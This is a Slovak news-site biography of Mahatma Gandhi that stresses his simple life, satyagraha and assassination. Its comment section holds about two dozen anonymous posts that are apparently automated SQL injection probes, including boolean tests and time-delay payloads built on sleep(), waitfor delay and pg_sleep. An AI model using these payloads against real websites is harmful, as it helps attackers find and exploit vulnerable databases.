Server.sk Auto Fit Kino Music Tech Zľava Môj Bazár Job Reality Fórum Súťaž Foto Počasie PR správy

Dnes je 18. augusta 2019, meniny má a zajtra
Aktuálny čas:

Mohandás Karamčand Gándhí – absolútny minimalista

Zdroj: © Server.sk, redaktor: iva, pridané: 04.06.2013

Nepriateľ triedneho systému, národný hrdina, ktorý bojoval za spravodlivosť. Toto sú prívlastky spájajúce sa s jeho menom. Celý život sa usiloval o vytvorenie slobodnej a zjednotenej Indie.
Mohandás Karamčand Gándhí – absolútny minimalista
Zdroj obrázku: Internet
 

Mohandás Karamčand Gándhí (1869-1948), nazývaný aj Mahátmá, bol indický politik a mysliteľ. Mohandás znamená “v službách lásky” (mohan=láska, dás=služba, služobník) a Karamčand znamená “nositeľ karmy”. Tieto dve mená ho sprevádzali celý jeho život. Slúžil ľuďom a osud svojej krajiny považoval za svoj vlastný.

Môžeš mať nutkanie vlastniť alebo používať materiálne veci, ale tajomstvo života leží v tom, že ti nikdy nebudú chýbať. -Gándhí-

Hovorili mu bhabú – otecko, ale aj Otec národa a Mahátmá, čo znamená Veľký duch. Bez pochýb bol jednou z najvýznamnejších postáv tej doby. Neexistuje človek, ktorý by nepočul o tomto drobnom vychudnutom mužovi s palicou, skromným oblečením a často bosými nohami. Učia sa o ňom už deti na základných školách. Jedol málo, spravidla len ovocie, zeleninu a ryžu. Nemal domov, majetky, spával na zemi. Nosil si so sebou misku a lyžicu. Charizmatická osobnosť tohto postavou drobného, ale srdcom obrovského velikána, sa nedala prehliadnuť. Vyžarovala z neho nekonečná láska a trpezlivosť.

Narodil sa v Porbandare v západnej Indii 2. októbra 1869. Oženil sa v mladom veku a stal sa otcom štyroch detí. Jeho otec bol ministerským predsedom a do svojho syna vkladal veľké nádeje. Všetky úspory venoval jeho vzdelaniu v Anglicku. Gándhí chcel študovať medicínu, ale na žiadosť otca sa rozhodol pre právo. Po skončení štúdia pôsobil ako právnik v Južnej Afrike. Žil tam 21 rokov. Po prvý krát o ňom verejnosť počula v roku 1893, práve vtedy sa presťahoval do Južnej Afriky a tam bojoval za práva tamojšej indickej menšiny. Počas tohto boju o práva prišiel takmer o život. Po napadnutí belochmi mal zákaz vstupu do hotelov, na ktorých bolo napísané „len pre Európanov“.

V roku 1914 odišiel z Južnej Afriky, pretože toto prostredie pre neho predstavovalo smrteľné nebezpečenstvo. V tomto období sa vzdal svojho majetku a stal sa z neho človek bez domova a materiálneho prepychu.

Pokus spojiť náboženstvo a politiku

Náboženstvo a politika boli už v tej dobe dve celkom protichodné veci. Politika nebola pre zbožných mužov a ľudí celkovo, pretože dovoľuje všetko. Praktiky zaužívané v politike boli jeho čistému inštinktu a celej prirodzenosti proti srsti. Ľudia si ho ctili a vážili a bol povolaný na čelo národa. Každý u neho hladal pomoc a záchrannú ruku.
Mohandás Karamčand Gándhí
Mohandás Karamčand Gándhí s manželkou.
zdroj: Internet

Jeho život ponúka mnohé kľúčové lekcie, ktoré nám môžu ukázať ako žiť v súlade s dobrom a pravdou. Praktikoval jednoduchosť a skromnosť vo všetkých oblastiach, ovplyvnil mnohých a inšpiruje dodnes. Keď zomrel, vlastnil maximálne 10 vecí – hodinky, okuliare, misku na jedenie, skromné oblečenie a obuv. Nezanechal po sebe žiadne materiálne bohatstvo, nemal ani vlastný dom. Narodil sa v prosperujúcej rodine, mal príkladnú výchovu, prestížne vzdelanie, a predsa sa rozhodol žiť skromne, bez viazanosti na materiálno. Nepotreboval si budovať rešpekt a uznanie na základe titulov a blahobytu. Vlastniť menej vecí prináša viac voľného času, jednoduchší život.

Netúžim po pominuteľnom pozemskom kráľovstve. Usilujem o kráľovstvo nebeské, ktorým je duchovné oslobodenie. K tomuto cieľu nie je pre mňa nutné, aby som hľadal útočisko v jaskyni. Nosím svoju jaskyňu so sebou. -Gándhí-

Jesť treba jednoduché jedlá

Nikdy nemal problém s nadváhou, stravoval sa striktne vegetariánsky a varil si jednoduché jedlá z čerstvých potravín. Jedol z malej misky, ktorá patrila k jeho „majetku“. Pozorné a sústredené jedenie, dôkladné prežúvanie potravy a žehnanie. Tieto praktiky sa aj v dnešnej dobe snaží dodržiavať mnoho ľudí. Jeho posolstvo a skromnosť potvrdzovalo aj skromné oblečenie.

Stres a nepokoj do jeho života nepatrili. Venoval sa meditáciám a modleniu. Práve tieto činnosti mu dodávali energiu a silu. Nikdy sa nesťažoval, neľutoval a žil v mieri so sebou samým a celým svetom. Bol úžasný rečník a spisovateľ, ale v súkromí hovoril veľmi málo a potichu. Preferoval stručnosť slova a bohatosť jeho činov. Život má rozprávať za človeka namiesto úst a prázdnych slov.

Ak má človek bohatstvo, neznamená to, že by ho mal. Jednoducho to znamená, že človek sa musí zbaviť spojenia s týmito vecami. –Gándhí-

Pravda – satyagraha

Slovo satya znamená pravdu a agraha znamená uchopenie, pevné držanie. Presný význam slova satyagraha je neomylné pridržiavanie sa pravdy, silu pravdy, pravdivosť. „Boh je Pravda. Preto je Pravda mocnejšia ako každá moc sveta a žiaden iný prostriedok nedokáže to, čo zmôže Pravda.”

Gándhí hlásal, že neubližovanie a držanie sa pravdy je najväčšou zbraňou, ktorá zdolá aj najmocnejšiu ríšu, najsilnejšieho nepriateľa, poznal sféry vedomia. Vedel, že človek pri svojom mentálno-duchovnom rozvoji sa neubráni utrpeniu, a bude trpieť na rôznych stupňoch. Nielen vonku, ale aj vnútorne. Pravidelne sa postil, meditoval, pravidelne držal celibát, veľa sa modlil. Toto bola jeho forma duchovného rastu a tréningu ku čistote.

Mahatmá Gándhí zahynul guľkou hinduistického fanatika 30. januára 1948. Prechádzal sa v záhrade a do cesty mu vstúpil šéfredaktor hinduistického týždenníka Mahásabha Náthurám Gódsé. Gándhí sa skromne usmial svojím bezzubým úsmevom a v tej chvíli mu Gódsé strelil tri rany do srdca. Gándhí zomrel s "božím menom na perách". Túto tragédiu videli jeho netere, ktoré sa s ním prechádzali v záhrade. Veľkolepý pohreb mu z vďaky vystrojil jeho národ. Večný hľadač pravdy, bojovaním za lásku a spravodlivosť odišiel na druhý svet so všetkou cťou a úctou. Za jeho rakvou kráčalo viac ako milión ľudí a jeho popol bol vhodený do rieky Gangy.

Nikdy nezastával oficiálny úrad, nikdy mu neprináležala výkonná moc, ale aj napriek tomu bol považovaný za značnú autoritu. Nepriateľ triedneho systému, národný hrdina, ktorý bojoval za spravodlivosť. Toto sú prívlastky spájajúce sa s jeho menom. Celý život sa usiloval o vytvorenie slobodnej a zjednotenej Indie.

Albert Eistein o ňom povedal: „Budúce generácia sotva kedy uveria, že takýto človek z mäsa a kostí mohol vôbec kráčať po tejto zemi.“
Server.sk v iOS Server.sk v Androide
 
 

Diskusia k článku

Fotografia
Anonym
pred 6 rokmi
Každý kto hlása pravdu tak ľudia ho vysmejú, zosmiešnia, následne prenasledujú a potom ho zavraždia a až keď toto ľudia dosiahnu, tak následne zistia že ten človek mal pravdu. Tak dopadol aj Gádhí. Na túto ľudskú vlastnosť získanú prepestovaným ľudským rozumom doplatil aj Boží Syn Kristus, ktorého ľudia vymiali, duchovenstvo - vtedy židovské ho nazývalo sektárom a rúhačom a následne kňazi zosnuvali aj jeho popravu ma kríži vraždy. A zaslepný ľudia žiadali prepustiť radšej vrahov. V deň popravy Ježiša / zaslepným ľudstvom/ Praduchovné Bytosti v nebesách zvolali zabili Baránka. V histórii ľudstva každý, kto hlásal pravdu skončil popravený a prinajmenšom zosmniešnený.

 

Diskusné príspevky (26)

Fotografia
Anonym
pred rokmi
-1 OR 2+289-289-1=0+0+0+1 --
Fotografia
Anonym
pred rokmi
-1 OR 3+289-289-1=0+0+0+1 --
Fotografia
Anonym
pred rokmi
-1 OR 2+345-345-1=0+0+0+1
Fotografia
Anonym
pred rokmi
-1 OR 3+345-345-1=0+0+0+1
Fotografia
Anonym
pred rokmi
-1' OR 2+434-434-1=0+0+0+1 --
Fotografia
Anonym
pred rokmi
-1' OR 3+434-434-1=0+0+0+1 --
Fotografia
Anonym
pred rokmi
-1' OR 2+135-135-1=0+0+0+1 or 'RmUC0Z9V'='
Fotografia
Anonym
pred rokmi
-1' OR 3+135-135-1=0+0+0+1 or 'RmUC0Z9V'='
Fotografia
Anonym
pred rokmi
-1" OR 2+158-158-1=0+0+0+1 --
Fotografia
Anonym
pred rokmi
-1" OR 3+158-158-1=0+0+0+1 --
Fotografia
Anonym
pred rokmi
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/
Fotografia
Anonym
pred rokmi
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
Fotografia
Anonym
pred rokmi
-1; waitfor delay '0:0:6' --
Fotografia
Anonym
pred rokmi
-1); waitfor delay '0:0:6' --
Fotografia
Anonym
pred rokmi
-1)); waitfor delay '0:0:9' --
Fotografia
Anonym
pred rokmi
1 waitfor delay '0:0:9' --
Fotografia
Anonym
pred rokmi
5MRGGJQf'; waitfor delay '0:0:3' --
Fotografia
Anonym
pred rokmi
5JloJzM8'); waitfor delay '0:0:3' --
Fotografia
Anonym
pred rokmi
MVi2wvZx')); waitfor delay '0:0:6' --
Fotografia
Anonym
pred rokmi
-1;select pg_sleep(9); --
Fotografia
Anonym
pred rokmi
-1);select pg_sleep(9); --
Fotografia
Anonym
pred rokmi
-1));select pg_sleep(3); --
Fotografia
Anonym
pred rokmi
oenG11SE';select pg_sleep(6); --
Fotografia
Anonym
pred rokmi
g37Aa3B4');select pg_sleep(6); --
Fotografia
Anonym
pred rokmi
TmAdID0f'));select pg_sleep(9); --
Fotografia
Anonym
pred 6 rokmi
Nepriateľ triedneho systému, národný hrdina, ktorý bojoval za spravodlivosť. Toto sú prívlastky spájajúce sa s jeho menom. Celý život sa usiloval o vytvorenie slobodnej a zjednotenej Indie. Odkaz na článok: http://server.sk/zaujimavosti/profily/mohandas-karamcand-gandhi-absolutny-minimalista/

Bol to človek do ktorého prúdilo Svetlo od nášho Boha - Stvoriteľa Otca Nebeského. Z neho by si mali zobrať príklad mnohý kresťanský duchovný / vatikán a im podobný, ktorý premenili dom Nášho Otca Nebeského na pelech klamárov a mamonárov /.
Tvoje meno:

Komentár:Ďalší obsah siete Server.sk


Vyberáme z archívu ...

pred 7 rokmi
Slovenskí priaznivci mobilnej komunikácie sa stretnú na prvom podujatí komunity Mobile Monday v Bratislave v pondelok 4. júna 2012.
pred 2 rokmi
Prvá kniha Jany Pronskej ešte z roku 2008 vyšla teraz v novom vydaní, keďže je o ňu stále mimoriadny záujem.
pred 7 rokmi
Koncern chce začleniť MAN do skupiny, bude zaň však musieť zaplatiť minimálne 2,96 mld. eur.
pred 12 rokmi
Dym z marihuany môže škodiť pľúcam až päťkrát viac ako dym z tabakových cigariet.
pred 8 rokmi
Fiat začal v Taliansku uvádzať novú Pandu na trh.
pred 6 rokmi
Stal sa ambasádorom automobilky Mercedes-Benz pre bezpečnosť
pred 9 rokmi
Dovolenka pri mori, na kúpaliskách alebo lyžovačka vyžaduje používanie opaľovacieho krému.
pred 4 rokmi
Tonya Graves sa na svojom druhom sólovom albume vracia k milovanému žánru a vlastným k hudobným koreňom.